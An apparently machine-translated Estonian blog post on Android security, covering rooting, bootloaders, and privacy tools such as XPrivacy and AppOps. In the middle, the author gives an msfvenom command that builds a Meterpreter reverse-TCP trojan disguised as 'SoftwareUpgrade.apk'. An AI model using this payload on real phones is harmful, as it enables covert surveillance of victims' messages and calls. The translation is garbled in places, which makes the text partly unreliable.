Kujutise allikas: pixabay.com

Sissejuhatus Androidi

Selles teemas õpime tundma Androidi ja avatud lähtekoodiga turvalisuse (OS) kohta. Android on avatud lähtekoodiga platvorm. See sarnaneb palju Linuxiga, kuid on Linuxist siiski liiga erinev. Linux on Androidiga võrreldes liiga küps. Niisiis, see on Chetan Nayak ja tere tulemast minu järgmisesse ajaveebisse Open Source Web Security. Olen selle blogi kirjutanud eeldusel, et enamik meist kasutaks Android K-d, st Kitkat või Android L st Lollipop.

Põhjuseks piparkookides ja Jellybeanis oli palju avatud lähtekoodiga turbeprobleeme, mida ma ei saa selles ühes blogis arutada. Ehk siis arutlen seda järgmisel korral, kui süvenen Androidi vanematesse versioonidesse. Nii et jääme praeguse seisuga kinni KitKatist ja Lollipopist.

Android loodi arendajaid silmas pidades. Turvakontrollide eesmärk oli vähendada arendajate koormust. Turvalisuse arendajad saavad hõlpsasti töötada ja tugineda paindlikele turvakontrollidele. Turvalisusega vähem kursis olevaid arendajaid kaitsevad ohutud vaikeseaded.

Algus

Ma ei olnud androidiga palju seotud kuni 2013. aasta hilisemas kvartalis, kui mul oli oma esimene Androidi mobiiltelefon, mis oli Sony Xperia L (selle hetke seisuga põhines 4.2.2). Kurat, ma isegi vihkasin androidit, kuna see oli eriti laguline, eriti Samsungi seadmed. Kaalusin toona isegi Windows Lumia ostmist, kuid õnneks mängisin palju mänge ja pidin ostma Xperia L, kuna see lahter oli Lag Proof. Sellel oli umbes 1 giga RAM ja Adreno 305. Piisavalt lahe, et midagi käivitada.

Pärast paljude mängude, nagu NOVA3 ja ModernCombat4, mängimist hakkas mul kuu aja jooksul see rakk igavleda. Ma teadsin, et Android põhineb Linuxil, ja tahtsin sellega oma muudatusi teha. Hakkasin lugema kohandamiste kohta ja sain teada nn juurdumisest. Kuna mul oli Linuxis hea tagavara, ei olnud juurdumine minu jaoks probleem. XDA natuke abiga suutsin oma raku edukalt juurida.

Siis aga tabas mind midagi. Niipea kui mu rakk pärast juurdumist taaskäivitas, hakkas see lihtsalt alglaadimist kinnitama (jäi alglaadimiskuvale igaveseks kinni). Ma isegi ei teadnud, milline androidi bootloader on. Niisiis, ma ei saanud midagi teha. Alles üks kuu oli see, et ma ostsin oma uue raku ja mu rakk oli nüüd pehme tellisega. Olen alati lugenud, et juurdumine on ohtlik, kuid ma ei teadnud, et see paneb mu raku paika. Kuid ma eksisin. Kui ma lugesin üht ja teist juurdumist puudutavat, lugesin, et juurdumine ei pane teie telefoni telliskiviks.

Juurdumine sarnaneb arvutis administraatori juurdepääsuga (tegelikult on see süsteemipääs, aga ma kirjutasin administraatori juurdepääsu, nii et noobidele on see hõlpsasti mõistetav.). See tähendab, et juurdumine ei pane teie telefoni kunagi telliskiviks. See oli tellimislaadur, mis tellis mu telefoni. Inimestele, kes ei tea alglaadijat, on; alglaadur sarnaneb Windowsi BIOS-iga. (Kui te ei tea, mis on BIOS, siis ei peaks te isegi lugema turvalisuse peale mõtlemist.) Bootloader või Hboot (seda nimetatakse ka androidiks) on esimene asi, mis käivitatakse, kui teie Android üles laadite. seade.

See pakendab juhised opsüsteemi kerneli alglaadimiseks ja enamik neist on spetsiaalselt loodud oma silumis- või muutmiskeskkonna käitamiseks.

Androidi turvakontrolli punkt

Mõelge alglaadurile kui teie seadme turvalisuse kontrollpunktile. Kui rikute selle kontrollpunkti, kaotate kõik, mis teil telefonis on. Niisiis, see on hea turvaelement, ma ütlen. Kuna kui kaotate oma telefoni ja keegi üritab saada juurjuurdepääsu lukust mööda saamiseks (eeldusel, et olete seadme lukustatud PIN-koodi või parooliga), peab ta sunniviisiliselt laadima alglaaduri lahti, mille tulemuseks on teie andmete kustutamine telefonis.

Nii et te ei pea muretsema selle pärast, et keegi seda kuritarvitab. Niisiis, sama on ka kohandatud ROMide puhul. ROMid on operatsioonisüsteemid, mis põhinevad Androidi versioonidel, mis on spetsiaalselt loodud teie riistvara arhitektuuri jaoks. Niisiis, kui kontrollite oma telefoni XDA-d, on teil telefonide jaoks n arv kohandatud ROM-e, millest kõige kuulsamad on tsüaankloriidi Mod-ROMid, mis on juba juurdunud ja millega on kaasas eelnevalt määratletud komplekt kohandamisi .

Androidi turvalisuse ülehindamine

Võib-olla olete juba praegu mõelnud, et teil on turvaline mobiiltelefon. Kuid ma olen siin selleks, et tõestada teid uuesti valesti ja see on kogu selle ajaveebi mõte. 2014. aasta teiseks kvartaliks olid inimesed juba hakanud arendama Androidi ekspluateerimise ja juurkomplekte, mis võiksid teie mobiiltelefone juurida ilma alglaadimisvõimalusi lahti ühendamata.

Pole piisavalt hirmutav? Las ma ütlen teile kõige ohtlikuma osa. Nad võiksid sellesse Troojalased isegi installida. Niisiis, isegi kui politseinik suudab lahtri jälgida ja te isegi saate selle tagasi, on endiselt suur oht, et nad näevad kõike, mida teete oma telefonis. See on midagi, mida olen katsetanud eksperimendina tegelikus praktilises keskkonnas.

Selle rünnaku jaoks kasutasin Metasploit. See, mille ma tegin, lõin troojalase ja installisin selle sihttelefoni. See oli lihtne apk-fail ja ma nimetasin selle tarkvarauuenduseks. Niisiis, kui kasutaja on tavaline mees, kellel on turvalisuse kohta vaid natuke ja baidiseid andmeid, siis ei julge ta seda isegi eemaldada. Ja veendusin, et alati, kui Internet aktiveeritakse, käivitab minu loodud pahavara automaatselt ennast ja loob ühenduse oma hostmasina kaugpordiga.

Rünnakuks kasutati järgmisi käske (Metasploit on läbitungimise testimise tarkvara, mis aitab kontrollida platvormi või konkreetsete seadmete haavatavusi.)

Minu host IP-aadress: 192.168.xx.xx

Minu hostport (ühenduse loomiseks tagasi): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Niisiis, siin lõin arvutis TCP-pöördkanali. Niisiis, iga kord, kui Internet käivitub androidis, avaneb minu Kali masinasse või masinasse, kuhu olen Metasploiti installinud, kesta.

Niisiis, nüüd teate, kui hirmutav on inimese jaoks, keda te isegi ei tunne, ja millel on andmed iga tehingu kohta, mida te oma mobiili kaudu teete, iga teine ​​kontakt, WhatsApi sõnumid, SMS, Viber ja Skype'i kõnelogi ja kõik. Kui see pole hirmutav, siis ma ei tea, mis see on.

Soovitatavad kursused

  • Sertifitseerimise kursus rubiini silumisel
  • Terve PHP MySQL-i kursus
  • Veebipõhine sertifitseerimise kursus VB.NET programmeerimises
  • ITIL-i fondi veebikursus

Katvus

Turvaküsimustest piisavalt. Me kõik teame, et igal teisel platvormil on turvaprobleeme. Kuidas me saaksime siis turvalised olla? See pole päris tõsi. Platvorme saab muuta kindlaks kuni kindla punktini, kuid pärast seda on meie ülesanne veenduda, et need nii püsiksid. Julgeolekumaailmas on kurikuulus tsitaat:

„Sotsiaalne insener: kuna inimlikule rumalusele pole pai"

Kuulsin seda fraasi juba tükk aega tagasi, kui vaatasin DefConi konverentsi.

Kui tehniline haavatavus puudub, peaksite proovima häkkida inimesi. Ja selle all ei pea ma silmas hüpnotismi ja muud. Ma mõtlen sotsiaaltehnikat. Selle kohta saate lisateavet minu teisest ajaveebist “Küberturvalisuse tähtsus meie igapäevases elus”.

Androidi põhiturbefunktsioon

Lisaks sotsiaaltehnoloogia, mille eest saab hoolt kanda ainult siis, kui oled tark; Androidi rakendusi saab turvalisel viisil arendada, et veenduda, et see jääb selliseks.

Nii et siin on mõned peamised turvafunktsioonid, mis aitavad teil turvalisi rakendusi luua:

  • Androidi rakenduste liivakast, mis eraldab teie rakenduse andmed ja koodi täitmise muudest rakendustest.
  • Rakendusraamistik tavaliste turvafunktsioonide, näiteks krüptograafia, lubade ja turvalise IPC, jõuliste rakendustega.
  • Krüptitud failisüsteem, mille saab lubada kadunud või varastatud seadmete andmete kaitsmiseks.
  • Kasutaja antud õigused süsteemi funktsioonidele ja kasutajaandmetele juurdepääsu piiramiseks.
  • Rakenduse määratletud õigused rakenduse andmete haldamiseks rakendusepõhiselt.

Mida saate teha, kui soovite turvalist keskkonda, kuid te pole arendaja?

Alates Android 5 st Lollipopist pakub see funktsiooni, kus kasutaja saab telefonide ja tahvelarvutite kasutamiseks lisada mitu profiili ja piiratud režiimid. Pealegi, kui olete oma telefoni juurdunud, on Xposed-moodulites ka Androidi rakendusi nagu AppOps, Xprivacy või Privacy Guard, mis aitavad teil peaaegu kõige eest hoolitseda. Selleks peate installima Xposed Frameworki.

Xposed Framework võimaldab Xposed-moodulitel töötada. Xposed-moodulid võimaldavad teil muuta Apk-failide ja süsteemifailide käitumist, ilma et peaksite installima teistsugust ROMi. Samuti on muudatuste hõlbus tühistamine, nii et siin on vähe ohtu ja see pole isegi aeganõudev, kuna pole vaja mitu ROM-i, tuuma ja nende veaparandusi vilkuma panna.

Xprivacy, Privacy Guard ja AppOps on avatud moodulid, mis võimaldavad teil androidi turvaliseks muuta, valides, millisele rakendusele peaks olema juurdepääs sellisele nagu Internet, klaviatuur, sdcard, juurjuurdepääs ja palju muud. Võite isegi keelata juurdepääsu ainult konkreetsetele teenustele ja luua selle jaoks kasutaja määratletud mallid. Minu jaoks eelistan valida Xprivacy. Kuid siin on mõned andmed või erinevused, kui soovitate erineda, et valida ülaltoodud kolme vahel.

AppOps:

Selle tutvustas Google algselt Android 4.3-s. (See on peamine põhjus, miks ma seda ei toeta. Ma ei usalda Google'i. Kutsuge seda Paranoiaks, kuid google jälgib kõike, mida teete. Ja ma ei vaja, et keegi jälgiks kõike, mida ma teen, aga kui te usaldate Google'i, tee seda.). AppOps-i peamine piirang on see, et Google lubab teil blokeerida juurdepääsu ainult nendele rakendustele, mida ta soovib blokeerida.

See tähendab, kui soovite blokeerida Google'iga seotud rakendused, näiteks Play teenused (mis tegelikult tarbib üle 50% teie tavalisest mälust, akust ja andmetest (Internet)), siis te ei saa seda teha. See on veel üks põhjus, miks ma vihkan Google'i. Niisiis, ma usun, et AppOps pole minu jaoks midagi muud kui pahavara. (aga ma mõtlen ainult nii, et ei, kui usaldate ainult Google'i)

Privaatsuse valvur:

Privacy Guard on tsüaankloriidi Mod asendatud AppOps-i jaoks loodud lihtne liides. Kui olete algaja, siis soovitan teil seda kasutada, kuna sellel on ainult sisse-välja lülitamise nupp ja enesemääratletud mallid, millisele rakendusele peaks olema juurdepääs. See pole nii turvaline, kui on pahavara, mis toimib või esindab nagu süsteemirakendus. Kuid hea on alustada.

Xprivacy:

Xprivacy on tööriist Kõik ühes. Kuid see on suunatud ekspertidele. Võite võrrelda Šveitsi armee nuga. Selles on kõik olemas ja see võib muuta teie telefoni turvaliseks igal muul viisil, kuid kui te ei tea, mida teete, segab see teie telefoni vaid segi ja peatab rakenduste käivitamise isegi. Samuti saate piirata juurdepääsu süsteemirakendustele. See on see, mida mina isiklikult eelistan valida.

Lisaks ülaltoodud moodulitele on Xposedis olemas ka muid moodulid, näiteks Llighting Firewall või BootManager, mis aitavad piirata konkreetsete rakenduste juurdepääsu Internetile ja peatada rakenduste telefoni taaskäivitamisel süsteemi kõrval käivitades.

Niisiis, see oleks selle ajaveebi kohta. Turvaprobleemide korral võite kindlasti külastada XDA veebisaiti või olla selle liige, mis annab teile privaatsuse kohta palju rohkem teavet.

Soovitatavad artiklid: -

See on olnud Androidi juhend. Siin arutasime Androidi põhikontseptsiooni, turvakontrolli punkte ja põhiturbefunktsiooni. Lisateavet leiate ka meie muudest soovitatud artiklitest -

  1. Androidi intervjuu küsimused - kümme parimat küsimust
  2. 8 kasulikku Siri-alternatiivi Androidi jaoks
  3. 28 parimat näpunäidet Androidi rakenduste arendusriistade jaoks
  4. Karjäär Androidi arendamisel

Kategooria:

Tarkvaraarendus